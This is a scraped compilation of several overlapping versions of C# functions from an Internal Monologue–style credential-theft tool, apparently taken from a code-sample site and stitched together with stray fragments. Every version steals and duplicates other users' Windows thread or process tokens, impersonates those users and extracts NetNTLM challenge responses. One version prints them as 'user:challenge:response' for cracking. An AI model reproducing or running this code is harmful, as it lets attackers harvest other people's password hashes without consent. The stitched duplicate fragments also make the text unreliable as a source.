public string HandleThread(ProcessThread thread, string challenge, bool verbose)
        {
            var output = "";

            try
            {
                var    token = IntPtr.Zero;
                string SID   = null;

                //Try to get thread handle
                var handle = OpenThread(0x0040, true, new IntPtr(thread.Id));

                //If failed, return
                if (handle == IntPtr.Zero)
                {
                    return(output);
                }

                if (OpenThreadToken(handle, 0x0008, true, ref token))
                {
                    //Get the SID of the token
                    SID = GetLogonId(token);
                    CloseHandle(token);
                    if (!ValidateSID(SID, verbose))
                    {
                        return(output);
                    }

                    if (OpenThreadToken(handle, 0x0002, true, ref token))
                    {
                        var sa = new SECURITY_ATTRIBUTES();
                        sa.nLength = Marshal.SizeOf(sa);
                        var dupToken = IntPtr.Zero;

                        DuplicateTokenEx(
                            token,
                            0x0002 | 0x0008,
                            ref sa,
                            (int)SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation,
                            (int)1,
                            ref dupToken);

                        CloseHandle(token);

                        try
                        {
                            using (WindowsImpersonationContext impersonatedUser = WindowsIdentity.Impersonate(dupToken))
                            {
                                if (verbose == true)
                                {
                                    output += string.Format("Impersonated user {0}\n", WindowsIdentity.GetCurrent().Name);
                                }
                                string result = InternalMonologueForCurrentUser(challenge);
                                //Ensure it is a valid response and not blank
                                if (!string.IsNullOrWhiteSpace(result))
                                {
                                    output += result + "\n";
                                    authenticatedUsers.Add(SID);
                                }
                                else if (verbose == true)
                                {
                                    output += string.Format("Got blank response for user {0}\n", WindowsIdentity.GetCurrent().Name);
                                }
                            }
                        }
                        catch
                        { /*Does not need to do anything if it fails*/ }
                        finally
                        {
                            CloseHandle(dupToken);
                        }
                    }
                }
            }
            catch (Exception)
            { /*Does not need to do anything if it fails*/ }
            return(output);
        }
        public static void HandleThread(ProcessThread thread, string challenge, bool verbose)
        {
            string SID = null;

            try
            {
                //Try to get thread handle
                var handle = OpenThread(0x0040, true, new IntPtr(thread.Id));

                //If failed, return
                if (handle == IntPtr.Zero)
                {
                    return;
                }

                //Duplicate thread token
                var token    = IntPtr.Zero;
                var dupToken = IntPtr.Zero;
                if (OpenThreadToken(handle, 0x0002, true, ref token))
                {
                    var sa = new SECURITY_ATTRIBUTES();
                    sa.nLength = Marshal.SizeOf(sa);

                    DuplicateTokenEx(
                        token,
                        0x0002 | 0x0008,
                        ref sa,
                        (int)SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation,
                        (int)1,
                        ref dupToken);

                    CloseHandle(token);

                    try
                    {
                        //Get the SID of the token
                        StringBuilder sb               = new StringBuilder();
                        int           TokenInfLength   = 1024;
                        IntPtr        TokenInformation = Marshal.AllocHGlobal(TokenInfLength);
                        Boolean       Result           = GetTokenInformation(dupToken, 1, TokenInformation, TokenInfLength, out TokenInfLength);
                        if (Result)
                        {
                            TOKEN_USER TokenUser = (TOKEN_USER)Marshal.PtrToStructure(TokenInformation, typeof(TOKEN_USER));

                            IntPtr  pstr = IntPtr.Zero;
                            Boolean ok   = ConvertSidToStringSid(TokenUser.User.Sid, out pstr);
                            SID = Marshal.PtrToStringAuto(pstr);
                            LocalFree(pstr);
                        }

                        Marshal.FreeHGlobal(TokenInformation);
                    }
                    catch (Exception e)
                    {
                        CloseHandle(dupToken);
                        CloseHandle(handle);
                    }
                }

                //Handle each available user only once
                if (SID != null && authenticatedUsers.Contains(SID) == false)
                {
                    try
                    {
                        //Impersonate user
                        using (WindowsImpersonationContext impersonatedUser = WindowsIdentity.Impersonate(dupToken))
                        {
                            if (verbose == true)
                            {
                                Console.WriteLine("Impersonated user " + WindowsIdentity.GetCurrent().Name);
                            }
                            string result = ByteArrayToString(InternalMonologueForCurrentUser(challenge));
                            //Ensure there is a valid response and not a blank
                            if (result != null && result.Length > 0)
                            {
                                Console.WriteLine(WindowsIdentity.GetCurrent().Name + ":" + challenge + ":" + result);
                                authenticatedUsers.Add(SID);
                            }
                            else if (verbose == true)
                            {
                                Console.WriteLine("Got blank response for user " + WindowsIdentity.GetCurrent().Name);
                            }
                        }
                    }
                    catch (Exception e)
                    { /*Does not need to do anything if it fails*/ }
                    finally
                    {
                        CloseHandle(dupToken);
                        CloseHandle(handle);
                    }
                }
            }
            catch (Exception)
            { /*Does not need to do anything if it fails*/ }
        }
        public static void HandleThread(ProcessThread thread, string challenge, bool verbose)
        {
            try
            {
                var    token    = IntPtr.Zero;
                var    dupToken = IntPtr.Zero;
                string SID      = null;

                //Try to get thread handle
                var handle = OpenThread(0x0040, true, new IntPtr(thread.Id));

                //If failed, return
                if (handle == IntPtr.Zero)
                {
                    return;
                }

                if (OpenThreadToken(handle, 0x0008, true, ref token))
                {
                    //Get the SID of the token
                    SID = GetLogonId(token);
                    CloseHandle(token);

                    //Check if this user hasn't been handled yet
                    if (SID != null && authenticatedUsers.Contains(SID) == false)
                    {
                        if (OpenThreadToken(handle, 0x0002, true, ref token))
                        {
                            var sa = new SECURITY_ATTRIBUTES();
                            sa.nLength = Marshal.SizeOf(sa);

                            DuplicateTokenEx(
                                token,
                                0x0002 | 0x0008,
                                ref sa,
                                (int)SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation,
                                (int)1,
                                ref dupToken);

                            CloseHandle(token);

                            try
                            {
                                using (WindowsImpersonationContext impersonatedUser = WindowsIdentity.Impersonate(dupToken))
                                {
                                    if (verbose == true)
                                    {
                                        Console.WriteLine("Impersonated user " + WindowsIdentity.GetCurrent().Name);
                                    }
                                    string result = InternalMonologueForCurrentUser(challenge);
                                    //Ensure it is a valid response and not blank
                                    if (result != null && result.Length > 0)
                                    {
                                        Console.WriteLine(result);
                                        authenticatedUsers.Add(SID);
                                    }
                                    else if (verbose == true)
                                    {
                                        Console.WriteLine("Got blank response for user " + WindowsIdentity.GetCurrent().Name);
                                    }
                                }
                            }
                            catch (Exception e)
                            { /*Does not need to do anything if it fails*/ }
                            finally
                            {
                                CloseHandle(dupToken);
                            }
                        }
                    }
                }
            }
            catch (Exception)
            { /*Does not need to do anything if it fails*/ }
        }
Beispiel #4
0
        public InternalMonologueConsole HandleProcess(Process process, string challenge, bool verbose)
        {
            var console = new InternalMonologueConsole();

            try
            {
                var    token    = IntPtr.Zero;
                var    dupToken = IntPtr.Zero;
                string SID      = null;

                if (OpenProcessToken(process.Handle, 0x0008, ref token))
                {
                    //Get the SID of the token
                    SID = GetLogonId(token);
                    CloseHandle(token);
                    if (!ValidateSID(SID, verbose))
                    {
                        return(null);
                    }

                    if (verbose)
                    {
                        console.AddConsole(string.Format("{0} {1}\n", SID, process.ProcessName));
                    }
                    if (OpenProcessToken(process.Handle, 0x0002, ref token))
                    {
                        var sa = new SECURITY_ATTRIBUTES();
                        sa.nLength = Marshal.SizeOf(sa);

                        DuplicateTokenEx(
                            token,
                            0x0002 | 0x0008,
                            ref sa,
                            (int)SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation,
                            (int)1,
                            ref dupToken);

                        CloseHandle(token);

                        try
                        {
                            using (WindowsImpersonationContext impersonatedUser = WindowsIdentity.Impersonate(dupToken))
                            {
                                if (verbose == true)
                                {
                                    console.AddConsole(string.Format("Impersonated user {0}\n", WindowsIdentity.GetCurrent().Name));
                                }
                                var result = InternalMonologueForCurrentUser(challenge, true);
                                //Ensure it is a valid response and not blank
                                if (!result.Resp1.IsNullOrWhiteSpace())
                                {
                                    console.AddResponse(result);
                                    console.AddConsole(string.Format("{0}\n", result.ToString()));
                                    authenticatedUsers.Add(SID);
                                }
                                else if (verbose == true)
                                {
                                    console.AddConsole(string.Format("Got blank response for user {0}\n", WindowsIdentity.GetCurrent().Name));
                                }
                            }
                        }
                        catch
                        { /*Does not need to do anything if it fails*/ }
                        finally
                        {
                            CloseHandle(dupToken);
                        }
                    }
                }
            }
            catch (Exception)
            { /*Does not need to do anything if it fails*/ }
            return(console);
        }